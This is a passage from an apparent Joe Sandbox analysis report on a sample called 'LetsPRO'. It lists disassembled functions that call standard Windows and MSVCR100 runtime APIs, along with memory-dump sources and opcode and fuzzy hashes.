                                        • _errno.MSVCR100 ref: 6C94E9CD
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94E9D8
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • GetFileAttributesA.KERNEL32(00000000), ref: 6C94E9E5
                                        • GetLastError.KERNEL32 ref: 6C94E9F0
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C94E9F7
                                        • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 6C94EA11
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AttributesFile$ErrorLast__doserrno__dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 567378056-0
                                        • Opcode ID: cf3426812127a9734a62e7dd3346c15bc7f6753c3ab1b7a32ffcb9bfc6e82e4b
                                        • Instruction ID: 124e5174881eebb32aeba7d5f231f04813b2c1008c734db9950e53c1fac680e0
                                        • Opcode Fuzzy Hash: cf3426812127a9734a62e7dd3346c15bc7f6753c3ab1b7a32ffcb9bfc6e82e4b
                                        • Instruction Fuzzy Hash: 57F0B471514944AFCB505FB9EC087993A69AF5237DF148315F43C849E0CF31C840D6E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9503B7 Relevance: 10.5, APIs: 7, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C9503C2
                                        • _errno.MSVCR100 ref: 6C9503CA
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9503D5
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 6C9503E2
                                        • GetLastError.KERNEL32 ref: 6C9503ED
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C9503F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 6C95040E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AttributesFile$ErrorLast__doserrno__dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 567378056-0
                                        • Opcode ID: 0bb17c10b83f660b8e42a77f929f9668eaf78b7ec17de3e2ef6e6ba1c073303f
                                        • Instruction ID: ac5bdfbafc089ac0074777f14f48a7aab4c2243a3dd9dcc54ff855e35200ea21
                                        • Opcode Fuzzy Hash: 0bb17c10b83f660b8e42a77f929f9668eaf78b7ec17de3e2ef6e6ba1c073303f
                                        • Instruction Fuzzy Hash: 76F09071514588DBCB105FB5DD487A93A69AF6237DF549314E438C4DE0CB71C460D6A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C973CF9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 3186804695-2671469338
                                        • Opcode ID: 9409c5a0f4b8fefc6144f08392dbb776af12daaef2442993d67dc15f2612c84e
                                        • Instruction ID: 8534cf40d3523bebd694d0b7db4a47f9780c4dd71b373d69bafb0e95d61ab945
                                        • Opcode Fuzzy Hash: 9409c5a0f4b8fefc6144f08392dbb776af12daaef2442993d67dc15f2612c84e
                                        • Instruction Fuzzy Hash: EFE012346151088EC7209B75C589BE836E8BB58B1EF1514A5D80CCBB21C77CD49449A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9721C2 Relevance: 9.3, APIs: 6, Instructions: 314COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _store_winword.LIBCMT ref: 6C972420
                                        • _store_winword.LIBCMT ref: 6C972445
                                        • _errno.MSVCR100(?,?,00000000,?,?,6C972AF4,?,?,?,00000000,?,?,?), ref: 6C97247E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000000,?,?,6C972AF4,?,?,?,00000000,?,?,?), ref: 6C972489
                                        • __tzname.MSVCR100(?,?,00000000,?,?,6C972AF4,?,?,?,00000000,?,?,?), ref: 6C9724D0
                                        • _store_str.LIBCMT ref: 6C97256C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _store_winword$__tzname_errno_invalid_parameter_noinfo_store_str
                                        • String ID:
                                        • API String ID: 3353331024-0
                                        • Opcode ID: a2d763723eb42af7ac788fc678362f75a71ff4cfb770c802690fbb3489184755
                                        • Instruction ID: 2bdb2fc5d740e98260a198c5ed0a9430b33c875af8c7d3c80d9cb539a0455f0b
                                        • Opcode Fuzzy Hash: a2d763723eb42af7ac788fc678362f75a71ff4cfb770c802690fbb3489184755
                                        • Instruction Fuzzy Hash: 9C91E9B1737D96CBDB348E68884CB5A77AABB92B44F104215E860E7F64C330D851C7B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9174A2 Relevance: 9.2, APIs: 6, Instructions: 191COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        • Opcode ID: 7253d00a72f10d7faac2334dce063ac8a0295ac514dd3ffbb640268f26afd021
                                        • Instruction ID: b790cbc617afb3b2fefd7447d9906a84893c71ce3bc8e16f76694b4905af1811
                                        • Opcode Fuzzy Hash: 7253d00a72f10d7faac2334dce063ac8a0295ac514dd3ffbb640268f26afd021
                                        • Instruction Fuzzy Hash: 9351D83534A349CFD311CA6DC4917C57BB69F72668F28809ED0848BE42D376D54BC7A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C939DDB Relevance: 9.1, APIs: 6, Instructions: 147threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 6C939DE8
                                        • TlsSetValue.KERNEL32(?), ref: 6C939DFB
                                        • TlsSetValue.KERNEL32(00000000), ref: 6C939F60
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C939F85
                                        • _CxxThrowException.MSVCR100(?,6C939F9C), ref: 6C939F93
                                        • std::exception::exception.LIBCMT(00000000), ref: 6C939FB7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 1797647509-0
                                        • Opcode ID: ebcedf83ee49ef34dd0595815298258a912040595efcd86ecf5c4f34a0b26495
                                        • Instruction ID: 09342eb2959afb0ae157c1a1446e59f30de550d8835e4f4740eb45259a6fcce6
                                        • Opcode Fuzzy Hash: ebcedf83ee49ef34dd0595815298258a912040595efcd86ecf5c4f34a0b26495
                                        • Instruction Fuzzy Hash: EE51EB31704264AFCB059F74C844BEDBB74BF62208F1561AAE05D9BB92CF35D819CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90AD9E Relevance: 9.1, APIs: 6, Instructions: 121COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(0000000B,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C90ADC5
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • EnterCriticalSection.KERNEL32(0000000C,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C90AE44
                                        • _calloc_crt.MSVCR100(00000020,00000040,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C930524
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalEnterSection$_calloc_crt_lock
                                        • String ID:
                                        • API String ID: 3858677252-0
                                        • Opcode ID: 81ce73c148f313e56c93a648ce41190ccd88807de07077b380fb49f863bad783
                                        • Instruction ID: 6dc3221867f2808fcf83a4796a7ec520e81327b07f6f85b0f40fe5ce00ba28d8
                                        • Opcode Fuzzy Hash: 81ce73c148f313e56c93a648ce41190ccd88807de07077b380fb49f863bad783
                                        • Instruction Fuzzy Hash: D1411771B057828BDB108F69D44879DBBF4AF12328F24931DC175A7AD0DB74C985CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C906372 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6C906475,?,?,?), ref: 6C9063B5
                                        • _memset.LIBCMT(00000000,00000000,00000000,?,?,?,6C906475,?,?,?,?,?,?,?,?,?), ref: 6C9063FB
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6C906410
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6C90641E
                                        • _freea_s.MSVCR100(00000000), ref: 6C906428
                                        • malloc.MSVCR100(00000008,?,?,?,6C906475,?,?,?,?,?,?,?,?,?,?,?), ref: 6C930D59
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$StringType_freea_s_memsetmalloc
                                        • String ID:
                                        • API String ID: 2935806426-0
                                        • Opcode ID: b7b258f3382a52f812f81017206c0227332b82dbc9825a612513c17b3b7a1f97
                                        • Instruction ID: b4f77eb175b790f04fdc39012df873e2db38d55d202e2e3349ab528b0b0ac887
                                        • Opcode Fuzzy Hash: b7b258f3382a52f812f81017206c0227332b82dbc9825a612513c17b3b7a1f97
                                        • Instruction Fuzzy Hash: 2C31497160024AAFEF018FA8DC809AE7BADEF09258F210429FD14D7A51D735D9A4DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9002B7 Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,?,6C90036A,?,?,00000000), ref: 6C927986
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,6C90036A,?,?,00000000), ref: 6C927990
                                        • _errno.MSVCR100(?,?,?,?,6C90036A,?,?,00000000), ref: 6C92799C
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6C90036A,?,?,00000000), ref: 6C9279A6
                                        • _errno.MSVCR100(?,?,?,?,6C90036A,?,?,00000000), ref: 6C9279B2
                                        • _errno.MSVCR100(?,?,?,?,?,6C90036A,?,?,00000000), ref: 6C9279D1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        • Opcode ID: 947f6b379b6e61eb4a8ab5fe1951ac9f42a10fb65339dacfc346c79696855403
                                        • Instruction ID: 1028154d0f76274a5684cc0805c6f05bd94cbd762318c6103abb1fd7aa141656
                                        • Opcode Fuzzy Hash: 947f6b379b6e61eb4a8ab5fe1951ac9f42a10fb65339dacfc346c79696855403
                                        • Instruction Fuzzy Hash: 96212436326342DBC7294F38C8D05AE7369FF25718B20613EE1958BF54E770C4408395
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9043D6 Relevance: 9.1, APIs: 6, Instructions: 91COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6C904417
                                          • Part of subcall function 6C90257C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6C9025C0
                                        • _towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6C90442A
                                        • _errno.MSVCR100(?), ref: 6C92C541
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C92C54C
                                        • _errno.MSVCR100(?,?), ref: 6C92C567
                                        • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6C92C572
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
                                        • String ID:
                                        • API String ID: 3991495309-0
                                        • Opcode ID: 4dc1f7ecb7eb869011e344276db02855934646603c57a96c7c51ed7f9bbc2ff2
                                        • Instruction ID: 51b6762e210291163f8cf2e91d6dd18e3ba36a344b3d2b8c5e5371f576b62a9b
                                        • Opcode Fuzzy Hash: 4dc1f7ecb7eb869011e344276db02855934646603c57a96c7c51ed7f9bbc2ff2
                                        • Instruction Fuzzy Hash: 78317072A051519BEB209F69C840BBD3BF8BF21719F240289E4B09B6D8DB38C944C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C946473 Relevance: 9.1, APIs: 6, Instructions: 88synchronizationtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C94647A
                                        • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 6C946488
                                        • GetTickCount.KERNEL32 ref: 6C94648F
                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6C9464B3
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6C9464E8
                                        • CloseHandle.KERNEL32(?), ref: 6C946594
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AcquireBase::CloseConcurrency::details::Concurrency@@CountH_prolog3HandleLock@details@ObjectReaderSchedulerSingleThrottlingTickTimeWaitWrite@_Writer
                                        • String ID:
                                        • API String ID: 1057910834-0
                                        • Opcode ID: f5d2efa4f0fe821962f11c76e33dff13b4ae3770b8f391b1939f206e62b3396a
                                        • Instruction ID: d44fc89afbcbac7645d4a8602aa0955518d748b9bd68a43bfe74588a186ba352
                                        • Opcode Fuzzy Hash: f5d2efa4f0fe821962f11c76e33dff13b4ae3770b8f391b1939f206e62b3396a
                                        • Instruction Fuzzy Hash: 3F31B2B0A042168BCF00CF68C8847ADBBB5BF65318F148279D855EB785DB74C945CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911BCE Relevance: 9.1, APIs: 6, Instructions: 77COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _strnicoll_l.MSVCR100(?,?,?,?,021F17E8,?,?,?,?,?,?,?), ref: 6C911C25
                                          • Part of subcall function 6C911B5F: _strnicmp_l.MSVCR100(?,021F17E8,?,?,7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C911BB9
                                        • _errno.MSVCR100(?,?,?,?,?,?,?), ref: 6C92AB34
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?), ref: 6C92AB3F
                                        • _errno.MSVCR100(021F17E8,?,?,?,?,?,?,?), ref: 6C92AB5A
                                        • _invalid_parameter_noinfo.MSVCR100(021F17E8,?,?,?,?,?,?,?), ref: 6C92AB65
                                        • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,?,?,00000000,021F17E8,?,?,?,?,?,?,?), ref: 6C92AB83
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$CompareString__crt_strnicmp_l_strnicoll_l
                                        • String ID:
                                        • API String ID: 1477060370-0
                                        • Opcode ID: 15715ca452482481f31b2a97f6f06117137e438981ae4eccfc26de386cf945e3
                                        • Instruction ID: 3797b49f7c579b0b3198eabc5f3b9395ed04c9dbda187714213622ad3794a756
                                        • Opcode Fuzzy Hash: 15715ca452482481f31b2a97f6f06117137e438981ae4eccfc26de386cf945e3
                                        • Instruction Fuzzy Hash: D321F63291524DFFCF118FA8C8859ED3B75AF12329B204399E0706B9A5EB32C954DB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C941D71 Relevance: 9.1, APIs: 6, Instructions: 74COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004), ref: 6C941DB5
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000), ref: 6C941DC5
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?), ref: 6C941DCC
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C941DFA
                                        • InitializeSListHead.KERNEL32(?), ref: 6C941E0F
                                        • InitializeSListHead.KERNEL32(?), ref: 6C941E15
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: HeadInitializeList$??2@_memsetmalloc
                                        • String ID:
                                        • API String ID: 2874038712-0
                                        • Opcode ID: aca489e54004bebeac1e95f4897620a5fd3e04c9fd16bf6c8893729030e90ea6
                                        • Instruction ID: 7cb849ee7d42036a4930b9ec5995fd2a6dbd29624d81c5b9b44ed1f0843ac835
                                        • Opcode Fuzzy Hash: aca489e54004bebeac1e95f4897620a5fd3e04c9fd16bf6c8893729030e90ea6
                                        • Instruction Fuzzy Hash: A22138B1601B009FD764CF2ED984A57FBE8BF99310B515A2EE19AC7AA0D770F8418B14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93F91B Relevance: 9.1, APIs: 6, Instructions: 74COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C93F95F
                                        • _memset.LIBCMT(00000000,00000000,?,00000000), ref: 6C93F96F
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000), ref: 6C93F976
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6C941862), ref: 6C93F9A4
                                        • InitializeSListHead.KERNEL32(00000018,00000000,6C941862), ref: 6C93F9B9
                                        • InitializeSListHead.KERNEL32(00000020), ref: 6C93F9BF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: HeadInitializeList$??2@_memsetmalloc
                                        • String ID:
                                        • API String ID: 2874038712-0
                                        • Opcode ID: 04fc659adcb83d0da9bc0b90e7afc5ee8fc2500418ad403787bc331393ea60ff
                                        • Instruction ID: 5a566767fe467a32887411d5845dfe8b3fca517e26c8085a1fbd85e087613060
                                        • Opcode Fuzzy Hash: 04fc659adcb83d0da9bc0b90e7afc5ee8fc2500418ad403787bc331393ea60ff
                                        • Instruction Fuzzy Hash: 22214CB1201B109FD364CF2ED985957F7E8BF88314B115A1EE19AC7AA0D771F8418B14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C943AE4 Relevance: 9.1, APIs: 6, Instructions: 74COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C943B28
                                        • _memset.LIBCMT(00000000,00000000,?,00000000), ref: 6C943B38
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000), ref: 6C943B3F
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6C941807), ref: 6C943B6D
                                        • InitializeSListHead.KERNEL32(00000010,00000000,6C941807), ref: 6C943B82
                                        • InitializeSListHead.KERNEL32(00000018), ref: 6C943B88
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
